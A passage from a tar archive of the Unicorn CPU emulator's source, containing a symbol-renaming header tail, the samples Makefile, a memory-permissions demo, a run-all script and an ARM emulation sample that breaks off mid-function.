helper_pcmpistri_xmm_x86_64 #define helper_pcmpistrm_xmm helper_pcmpistrm_xmm_x86_64 #define helper_crc32 helper_crc32_x86_64 #define helper_pclmulqdq_xmm helper_pclmulqdq_xmm_x86_64 #define helper_aesdec_xmm helper_aesdec_xmm_x86_64 #define helper_aesdeclast_xmm helper_aesdeclast_xmm_x86_64 #define helper_aesenc_xmm helper_aesenc_xmm_x86_64 #define helper_aesenclast_xmm helper_aesenclast_xmm_x86_64 #define helper_aesimc_xmm helper_aesimc_xmm_x86_64 #define helper_aeskeygenassist_xmm helper_aeskeygenassist_xmm_x86_64 #define cpu_sync_bndcs_hflags cpu_sync_bndcs_hflags_x86_64 #define cpu_x86_support_mca_broadcast cpu_x86_support_mca_broadcast_x86_64 #define x86_cpu_set_a20 x86_cpu_set_a20_x86_64 #define cpu_x86_update_cr0 cpu_x86_update_cr0_x86_64 #define cpu_x86_update_cr3 cpu_x86_update_cr3_x86_64 #define cpu_x86_update_cr4 cpu_x86_update_cr4_x86_64 #define x86_cpu_get_phys_page_attrs_debug x86_cpu_get_phys_page_attrs_debug_x86_64 #define cpu_x86_get_descr_debug cpu_x86_get_descr_debug_x86_64 #define do_cpu_init do_cpu_init_x86_64 #define do_cpu_sipi do_cpu_sipi_x86_64 #define x86_cpu_exec_enter x86_cpu_exec_enter_x86_64 #define x86_cpu_exec_exit x86_cpu_exec_exit_x86_64 #define x86_ldub_phys x86_ldub_phys_x86_64 #define x86_lduw_phys x86_lduw_phys_x86_64 #define x86_ldl_phys x86_ldl_phys_x86_64 #define x86_ldq_phys x86_ldq_phys_x86_64 #define x86_stb_phys x86_stb_phys_x86_64 #define x86_stl_phys_notdirty x86_stl_phys_notdirty_x86_64 #define x86_stw_phys x86_stw_phys_x86_64 #define x86_stl_phys x86_stl_phys_x86_64 #define x86_stq_phys x86_stq_phys_x86_64 #define helper_divb_AL helper_divb_AL_x86_64 #define helper_idivb_AL helper_idivb_AL_x86_64 #define helper_divw_AX helper_divw_AX_x86_64 #define helper_idivw_AX helper_idivw_AX_x86_64 #define helper_divl_EAX helper_divl_EAX_x86_64 #define helper_idivl_EAX helper_idivl_EAX_x86_64 #define helper_aam helper_aam_x86_64 #define helper_aad helper_aad_x86_64 #define helper_aaa helper_aaa_x86_64 #define helper_aas helper_aas_x86_64 #define helper_daa helper_daa_x86_64 #define helper_das helper_das_x86_64 #define helper_divq_EAX helper_divq_EAX_x86_64 #define helper_idivq_EAX helper_idivq_EAX_x86_64 #define helper_pdep helper_pdep_x86_64 #define helper_pext helper_pext_x86_64 #define helper_rclb helper_rclb_x86_64 #define helper_rcrb helper_rcrb_x86_64 #define helper_rclw helper_rclw_x86_64 #define helper_rcrw helper_rcrw_x86_64 #define helper_rcll helper_rcll_x86_64 #define helper_rcrl helper_rcrl_x86_64 #define helper_rclq helper_rclq_x86_64 #define helper_rcrq helper_rcrq_x86_64 #define helper_cr4_testbit helper_cr4_testbit_x86_64 #define helper_rdrand helper_rdrand_x86_64 #define helper_cmpxchg8b_unlocked helper_cmpxchg8b_unlocked_x86_64 #define helper_cmpxchg8b helper_cmpxchg8b_x86_64 #define helper_cmpxchg16b_unlocked helper_cmpxchg16b_unlocked_x86_64 #define helper_cmpxchg16b helper_cmpxchg16b_x86_64 #define helper_boundw helper_boundw_x86_64 #define helper_boundl helper_boundl_x86_64 #define helper_outb helper_outb_x86_64 #define helper_inb helper_inb_x86_64 #define helper_outw helper_outw_x86_64 #define helper_inw helper_inw_x86_64 #define helper_outl helper_outl_x86_64 #define helper_inl helper_inl_x86_64 #define helper_into helper_into_x86_64 #define helper_cpuid helper_cpuid_x86_64 #define helper_read_crN helper_read_crN_x86_64 #define helper_write_crN helper_write_crN_x86_64 #define helper_lmsw helper_lmsw_x86_64 #define helper_invlpg helper_invlpg_x86_64 #define helper_rdtsc helper_rdtsc_x86_64 #define helper_rdtscp helper_rdtscp_x86_64 #define helper_rdpmc helper_rdpmc_x86_64 #define helper_wrmsr helper_wrmsr_x86_64 #define helper_rdmsr helper_rdmsr_x86_64 #define helper_hlt helper_hlt_x86_64 #define helper_monitor helper_monitor_x86_64 #define helper_mwait helper_mwait_x86_64 #define helper_pause helper_pause_x86_64 #define helper_debug helper_debug_x86_64 #define helper_rdpkru helper_rdpkru_x86_64 #define helper_wrpkru helper_wrpkru_x86_64 #define helper_bndck helper_bndck_x86_64 #define helper_bndldx64 helper_bndldx64_x86_64 #define helper_bndldx32 helper_bndldx32_x86_64 #define helper_bndstx64 helper_bndstx64_x86_64 #define helper_bndstx32 helper_bndstx32_x86_64 #define helper_bnd_jmp helper_bnd_jmp_x86_64 #define helper_syscall helper_syscall_x86_64 #define helper_sysret helper_sysret_x86_64 #define x86_cpu_do_interrupt x86_cpu_do_interrupt_x86_64 #define do_interrupt_x86_hardirq do_interrupt_x86_hardirq_x86_64 #define x86_cpu_exec_interrupt x86_cpu_exec_interrupt_x86_64 #define helper_lldt helper_lldt_x86_64 #define helper_ltr helper_ltr_x86_64 #define uc_check_cpu_x86_load_seg uc_check_cpu_x86_load_seg_x86_64 #define helper_load_seg helper_load_seg_x86_64 #define helper_ljmp_protected helper_ljmp_protected_x86_64 #define helper_lcall_real helper_lcall_real_x86_64 #define helper_lcall_protected helper_lcall_protected_x86_64 #define helper_iret_real helper_iret_real_x86_64 #define helper_iret_protected helper_iret_protected_x86_64 #define helper_lret_protected helper_lret_protected_x86_64 #define helper_sysenter helper_sysenter_x86_64 #define helper_sysexit helper_sysexit_x86_64 #define helper_lsl helper_lsl_x86_64 #define helper_lar helper_lar_x86_64 #define helper_verr helper_verr_x86_64 #define helper_verw helper_verw_x86_64 #define cpu_x86_load_seg cpu_x86_load_seg_x86_64 #define helper_check_iob helper_check_iob_x86_64 #define helper_check_iow helper_check_iow_x86_64 #define helper_check_iol helper_check_iol_x86_64 #define do_smm_enter do_smm_enter_x86_64 #define helper_rsm helper_rsm_x86_64 #define helper_vmrun helper_vmrun_x86_64 #define helper_vmmcall helper_vmmcall_x86_64 #define helper_vmload helper_vmload_x86_64 #define helper_vmsave helper_vmsave_x86_64 #define helper_stgi helper_stgi_x86_64 #define helper_clgi helper_clgi_x86_64 #define helper_skinit helper_skinit_x86_64 #define helper_invlpga helper_invlpga_x86_64 #define cpu_svm_check_intercept_param cpu_svm_check_intercept_param_x86_64 #define helper_svm_check_intercept_param helper_svm_check_intercept_param_x86_64 #define helper_svm_check_io helper_svm_check_io_x86_64 #define cpu_vmexit cpu_vmexit_x86_64 #define do_vmexit do_vmexit_x86_64 #define tcg_x86_init tcg_x86_init_x86_64 #define gen_intermediate_code gen_intermediate_code_x86_64 #define restore_state_to_opc restore_state_to_opc_x86_64 #define x86_cpu_xsave_all_areas x86_cpu_xsave_all_areas_x86_64 #define x86_cpu_xrstor_all_areas x86_cpu_xrstor_all_areas_x86_64 #define cpu_get_fp80 cpu_get_fp80_x86_64 #define cpu_set_fp80 cpu_set_fp80_x86_64 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014650�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/Makefile����������������������������������������������������������������������0000664�0000000�0000000�00000005630�14675241067�0016314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Unicorn Engine # By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 include ../config.mk UNAME_S := $(shell uname -s) LIBDIR = .. BIN_EXT = AR_EXT = a # Verbose output? V ?= 0 CFLAGS += -Wall -Werror -I../include LDFLAGS += -L$(LIBDIR) -lunicorn -lpthread -lm ifeq ($(UNAME_S), Linux) LDFLAGS += -lrt endif LDLIBS += -lpthread -lunicorn -lm ifneq ($(CROSS),) CC = $(CROSS)gcc endif ifeq ($(UNICORN_ASAN),yes) CC = clang CXX = clang++ AR = llvm-ar CFLAGS += -fsanitize=address -fno-omit-frame-pointer LDFLAGS := -fsanitize=address ${LDFLAGS} endif # Cygwin? ifneq ($(filter CYGWIN%,$(UNAME_S)),) CFLAGS := $(CFLAGS:-fPIC=) LDLIBS += -lssp BIN_EXT = .exe AR_EXT = a # mingw? else ifneq ($(filter MINGW%,$(UNAME_S)),) CFLAGS := $(CFLAGS:-fPIC=) BIN_EXT = .exe AR_EXT = a endif ifeq ($(UNICORN_STATIC),yes) ifneq ($(filter MINGW%,$(UNAME_S)),) ARCHIVE = $(LIBDIR)/unicorn.$(AR_EXT) else ifneq ($(filter CYGWIN%,$(UNAME_S)),) ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) else ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) endif endif .PHONY: all clean UNICORN_ARCHS := $(shell if [ -e ../config.log ]; then cat ../config.log;\ else printf "$(UNICORN_ARCHS)"; fi) SOURCES = ifneq (,$(findstring arm,$(UNICORN_ARCHS))) SOURCES += sample_arm.c SOURCES += sample_armeb.c endif ifneq (,$(findstring aarch64,$(UNICORN_ARCHS))) SOURCES += sample_arm64.c SOURCES += sample_arm64eb.c endif ifneq (,$(findstring mips,$(UNICORN_ARCHS))) SOURCES += sample_mips.c endif #ifneq (,$(findstring ppc,$(UNICORN_ARCHS))) #SOURCES += sample_ppc.c #endif ifneq (,$(findstring sparc,$(UNICORN_ARCHS))) SOURCES += sample_sparc.c endif ifneq (,$(findstring x86,$(UNICORN_ARCHS))) SOURCES += sample_x86.c SOURCES += shellcode.c SOURCES += mem_apis.c SOURCES += sample_x86_32_gdt_and_seg_regs.c SOURCES += sample_batch_reg.c SOURCES += sample_mmu.c endif ifneq (,$(findstring m68k,$(UNICORN_ARCHS))) SOURCES += sample_m68k.c endif ifneq (,$(findstring tricore,$(UNICORN_ARCHS))) SOURCES += sample_tricore.c endif BINS = $(SOURCES:.c=$(BIN_EXT)) OBJS = $(SOURCES:.c=.o) all: $(BINS) $(BINS): $(OBJS) clean: rm -rf *.o $(BINS) %$(BIN_EXT): %.o @mkdir -p $(@D) ifeq ($(V),0) ifeq ($(UNICORN_SHARED),yes) $(call log,LINK,$(notdir $@)) @$(link-dynamic) endif ifeq ($(UNICORN_STATIC),yes) ifneq ($(filter MINGW%,$(UNAME_S)),) $(call log,LINK,$(notdir $(call staticname,$@))) @$(link-static) endif endif else ifeq ($(UNICORN_SHARED),yes) $(link-dynamic) endif ifeq ($(UNICORN_STATIC),yes) ifneq ($(filter MINGW%,$(UNAME_S)),) $(link-static) endif endif endif %.o: %.c @mkdir -p $(@D) ifeq ($(V),0) $(call log,CC,$(@:%=%)) @$(compile) else $(compile) endif define link-dynamic $(CC) $< ${CFLAGS} $(LDFLAGS) -o $@ endef define link-static $(CC) $< $(ARCHIVE) ${CFLAGS} $(LDFLAGS) -o $(call staticname,$@) endef staticname = $(subst $(BIN_EXT),,$(1)).static$(BIN_EXT) define log @printf " %-7s %s\n" "$(1)" "$(2)" endef define compile ${CC} ${CFLAGS} -c $< -o $@ endef ��������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/mem_apis.c��������������������������������������������������������������������0000664�0000000�0000000�00000026400�14675241067�0016610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Sample use of uc_mem_unmap, uc_mem_protect, and memory permissions Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #define __STDC_FORMAT_MACROS #include <unicorn/unicorn.h> #include <string.h> #include <stdlib.h> #include <string.h> #include <time.h> static int insts_executed; // callback for tracing instructions, detect HLT and terminate emulation static void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) { uint8_t opcode; unsigned char buf[256]; insts_executed++; if (uc_mem_read(uc, addr, buf, size) != UC_ERR_OK) { printf("not ok - uc_mem_read fail during hook_code callback, addr: " "0x%" PRIx64 "\n", addr); if (uc_emu_stop(uc) != UC_ERR_OK) { printf("not ok - uc_emu_stop fail during hook_code callback, addr: " "0x%" PRIx64 "\n", addr); _exit(-1); } } opcode = buf[0]; switch (opcode) { case 0x41: // inc ecx if (uc_mem_protect(uc, 0x101000, 0x1000, UC_PROT_READ) != UC_ERR_OK) { printf("not ok - uc_mem_protect fail during hook_code callback, " "addr: 0x%" PRIx64 "\n", addr); _exit(-1); } break; case 0x42: // inc edx if (uc_mem_unmap(uc, 0x101000, 0x1000) != UC_ERR_OK) { printf("not ok - uc_mem_unmap fail during hook_code callback, " "addr: 0x%" PRIx64 "\n", addr); _exit(-1); } break; case 0xf4: // hlt if (uc_emu_stop(uc) != UC_ERR_OK) { printf("not ok - uc_emu_stop fail during hook_code callback, addr: " "0x%" PRIx64 "\n", addr); _exit(-1); } break; default: // all others break; } } // callback for tracing invalid memory access (READ/WRITE/EXEC) static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t addr, int size, int64_t value, void *user_data) { switch (type) { default: printf("not ok - UC_HOOK_MEM_INVALID type: %d at 0x%" PRIx64 "\n", type, addr); return false; case UC_MEM_READ_UNMAPPED: printf("not ok - Read from invalid memory at 0x%" PRIx64 ", data size = %u\n", addr, size); return false; case UC_MEM_WRITE_UNMAPPED: printf("not ok - Write to invalid memory at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", addr, size, value); return false; case UC_MEM_FETCH_PROT: printf("not ok - Fetch from non-executable memory at 0x%" PRIx64 "\n", addr); return false; case UC_MEM_WRITE_PROT: printf("not ok - Write to non-writeable memory at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", addr, size, value); return false; case UC_MEM_READ_PROT: printf("not ok - Read from non-readable memory at 0x%" PRIx64 ", data size = %u\n", addr, size); return false; } } static void do_nx_demo(bool cause_fault) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t code_buf[0x3000]; insts_executed = 0; printf("===================================\n"); printf("# Example of marking memory NX (%s)\n", cause_fault ? "faulting" : "non-faulting"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok - Failed on uc_open() with error returned: %u\n", err); return; } uc_mem_map(uc, 0x100000, 0x3000, UC_PROT_READ | UC_PROT_EXEC); /* bits 32 page0: @0 times 4091 inc eax jmp page2 page1: @1000 times 4095 inc eax (or INC ECX) hlt page2: @2000 jmp page1 */ memset(code_buf, 0x40, sizeof(code_buf)); // fill with inc eax memcpy(code_buf + 0x1000 - 5, "\xe9\x00\x10\x00\x00", 5); // jump to 0x102000 memcpy(code_buf + 0x2000, "\xe9\xfb\xef\xff\xff", 5); // jump to 0x101000 code_buf[0x1fff] = 0xf4; // hlt if (cause_fault) { // insert instruction to trigger U_PROT_EXEC change (see hook_code // function) code_buf[0x1000] = 0x41; // inc ecx at page1 } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, code_buf, sizeof(code_buf))) { printf("not ok - Failed to write emulation code to memory, quit!\n"); return; } // intercept code and invalid memory events if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK || uc_hook_add(uc, &trace1, UC_HOOK_MEM_INVALID, hook_mem_invalid, NULL, 1, 0) != UC_ERR_OK) { printf("not ok - Failed to install hooks\n"); return; } // emulate machine code until told to stop by hook_code printf("BEGINNING EXECUTION\n"); err = uc_emu_start(uc, 0x100000, 0x103000, 0, 0); if (err != UC_ERR_OK) { printf("not ok - Failure on uc_emu_start() with error %u: %s\n", err, uc_strerror(err)); printf("FAILED EXECUTION\n"); } else { printf("SUCCESSFUL EXECUTION\n"); } printf("Executed %d instructions\n\n", insts_executed); uc_close(uc); } static void nx_test(void) { printf("NX demo - step 1: show that code runs to completion\n"); do_nx_demo(false); printf("NX demo - step 2: show that code fails without UC_PROT_EXEC\n"); do_nx_demo(true); } static const uint8_t WRITE_DEMO[] = "\x90\xc7\x05\x00\x20\x10\x00\x78\x56\x34\x12\xc7\x05\xfc\x0f\x10" "\x00\x78\x56\x34\x12\xc7\x05\x00\x10\x10\x00\x21\x43\x65\x87"; static void do_perms_demo(bool change_perms) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t code_buf[0x3000]; insts_executed = 0; printf("===================================\n"); printf("# Example of manipulating memory permissions\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok - Failed on uc_open() with error returned: %u\n", err); return; } uc_mem_map(uc, 0x100000, 0x3000, UC_PROT_ALL); /* bits 32 nop mov dword [0x102000], 0x12345678 mov dword [0x100ffc], 0x12345678 mov dword [0x101000], 0x87654321 ; crashing case crashes here times 1000 nop hlt */ memcpy(code_buf, WRITE_DEMO, sizeof(WRITE_DEMO) - 1); memset(code_buf + sizeof(WRITE_DEMO) - 1, 0x90, 1000); code_buf[sizeof(WRITE_DEMO) - 1 + 1000] = 0xf4; // hlt if (change_perms) { // write protect memory area [0x101000, 0x101fff]. see hook_code // function code_buf[0] = 0x41; // inc ecx } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, code_buf, sizeof(code_buf))) { printf("not ok - Failed to write emulation code to memory, quit!\n"); return; } // intercept code and invalid memory events if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK || uc_hook_add(uc, &trace1, UC_HOOK_MEM_INVALID, hook_mem_invalid, NULL, 1, 0) != UC_ERR_OK) { printf("not ok - Failed to install hooks\n"); return; } // emulate machine code until told to stop by hook_code printf("BEGINNING EXECUTION\n"); err = uc_emu_start(uc, 0x100000, 0x103000, 0, 0); if (err != UC_ERR_OK) { printf("FAILED EXECUTION\n"); printf("not ok - Failure on uc_emu_start() with error %u: %s\n", err, uc_strerror(err)); } else { printf("SUCCESSFUL EXECUTION\n"); } printf("Executed %d instructions\n\n", insts_executed); uc_close(uc); } static void perms_test(void) { printf("Permissions demo - step 1: show that area is writeable\n"); do_perms_demo(false); printf("Permissions demo - step 2: show that code fails when memory marked " "unwriteable\n"); do_perms_demo(true); } static void do_unmap_demo(bool do_unmap) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t code_buf[0x3000]; insts_executed = 0; printf("===================================\n"); printf("# Example of unmapping memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok - Failed on uc_open() with error returned: %u\n", err); return; } uc_mem_map(uc, 0x100000, 0x3000, UC_PROT_ALL); /* bits 32 nop mov dword [0x102000], 0x12345678 mov dword [0x100ffc], 0x12345678 mov dword [0x101000], 0x87654321 ; crashing case crashes here times 1000 nop hlt */ memcpy(code_buf, WRITE_DEMO, sizeof(WRITE_DEMO) - 1); memset(code_buf + sizeof(WRITE_DEMO) - 1, 0x90, 1000); code_buf[sizeof(WRITE_DEMO) - 1 + 1000] = 0xf4; // hlt if (do_unmap) { // unmap memory area [0x101000, 0x101fff]. see hook_code function code_buf[0] = 0x42; // inc edx (see hook_code function) } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, code_buf, 0x1000)) { printf("not ok - Failed to write emulation code to memory, quit!\n"); return; } // intercept code and invalid memory events if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK || uc_hook_add(uc, &trace1, UC_HOOK_MEM_INVALID, hook_mem_invalid, NULL, 1, 0) != UC_ERR_OK) { printf("not ok - Failed to install hooks\n"); return; } // emulate machine code until told to stop by hook_code printf("BEGINNING EXECUTION\n"); err = uc_emu_start(uc, 0x100000, 0x103000, 0, 0); if (err != UC_ERR_OK) { printf("FAILED EXECUTION\n"); printf("not ok - Failure on uc_emu_start() with error %u: %s\n", err, uc_strerror(err)); } else { printf("SUCCESSFUL EXECUTION\n"); } printf("Executed %d instructions\n\n", insts_executed); uc_close(uc); } static void unmap_test(void) { printf("Unmap demo - step 1: show that area is writeable\n"); do_unmap_demo(false); printf( "Unmap demo - step 2: show that code fails when memory is unmapped\n"); do_unmap_demo(true); } int main(int argc, char **argv, char **envp) { nx_test(); perms_test(); unmap_test(); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_all.sh�����������������������������������������������������������������0000775�0000000�0000000�00000002513�14675241067�0017321�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh [ -z "${UNAME}" ] && UNAME=$(uname) DIR=`dirname $0` if [ "$UNAME" = Darwin ]; then export DYLD_LIBRARY_PATH=. else export LD_LIBRARY_PATH=. fi if test -e $DIR/sample_x86; then echo "==========================" $DIR/sample_x86 -32 echo "==========================" $DIR/sample_x86 -64 echo "==========================" $DIR/sample_x86 -16 echo "==========================" $DIR/shellcode -32 echo "==========================" $DIR/mem_apis fi if test -e $DIR/sample_arm; then echo "==========================" $DIR/sample_arm fi if test -e $DIR/sample_arm64; then echo "==========================" $DIR/sample_arm64 fi if test -e $DIR/sample_mips; then echo "==========================" $DIR/sample_mips fi if test -e $DIR/sample_sparc; then echo "==========================" $DIR/sample_sparc fi if test -e $DIR/sample_m68k; then echo "==========================" $DIR/sample_m68k fi if test -e $DIR/mem_apis; then echo "==========================" $DIR/mem_apis fi if test -e $DIR/sample_batch_reg; then echo "==========================" $DIR/sample_batch_reg fi if test -e $DIR/sample_x86_32_gdt_and_seg_regs; then echo "==========================" $DIR/sample_x86_32_gdt_and_seg_regs fi if test -e $DIR/sample_mmu; then echo "==========================" $DIR/sample_mmu fi �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_arm.c������������������������������������������������������������������0000664�0000000�0000000�00000031713�14675241067�0017141�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated // #define ARM_CODE "\x37\x00\xa0\xe3" // mov r0, #0x37 #define ARM_CODE "\x00\xf0\x20\xe3" // nop // #define ARM_CODE "\x37\x00\xa0\xe3\x03\x10\x42\xe0" // mov r0, #0x37; sub r1, // r2, r3 #define THUMB_CODE "\x83\xb0" // sub sp, #0xc #define ARM_THUM_COND_CODE \ "\x9a\x42\x14\xbf\x68\x22\x4d\x22" // 'cmp r2, r3\nit ne\nmov r2, #0x68\nmov // r2, #0x4d' // code to be emulated #define ARM_CODE_EB \ "\xe3\xa0\x00\x37\xe0\x42\x10\x03" // mov r0, #0x37; sub r1, r2, r3 #define THUMB_CODE_EB "\xb0\x83" // sub sp, #0xc // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_arm(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r0 = 0x1234; // R0 register int r2 = 0x6789; // R1 register int r3 = 0x3333; // R2 register int r1; // R1 register printf("Emulate ARM code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM_CODE, sizeof(ARM_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_R0, &r0); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_R0, &r0); uc_reg_read(uc, UC_ARM_REG_R1, &r1); printf(">>> R0 = 0x%x\n", r0); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_thumb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int sp = 0x1234; // R0 register printf("Emulate THUMB code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, THUMB_CODE, sizeof(THUMB_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_SP, &sp); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + sizeof(THUMB_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_SP, &sp); printf(">>> SP = 0x%x\n", sp); uc_close(uc); } static void test_armeb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r0 = 0x1234; // R0 register int r2 = 0x6789; // R1 register int r3 = 0x3333; // R2 register int r1; // R1 register printf("Emulate ARM Big-Endian code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM_CODE_EB, sizeof(ARM_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_R0, &r0); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_R0, &r0); uc_reg_read(uc, UC_ARM_REG_R1, &r1); printf(">>> R0 = 0x%x\n", r0); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_thumbeb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int sp = 0x1234; // R0 register printf("Emulate THUMB Big-Endian code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, THUMB_CODE_EB, sizeof(THUMB_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_SP, &sp); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + sizeof(THUMB_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_SP, &sp); printf(">>> SP = 0x%x\n", sp); uc_close(uc); } static void test_thumb_mrs(void) { uc_engine *uc; uc_err err; 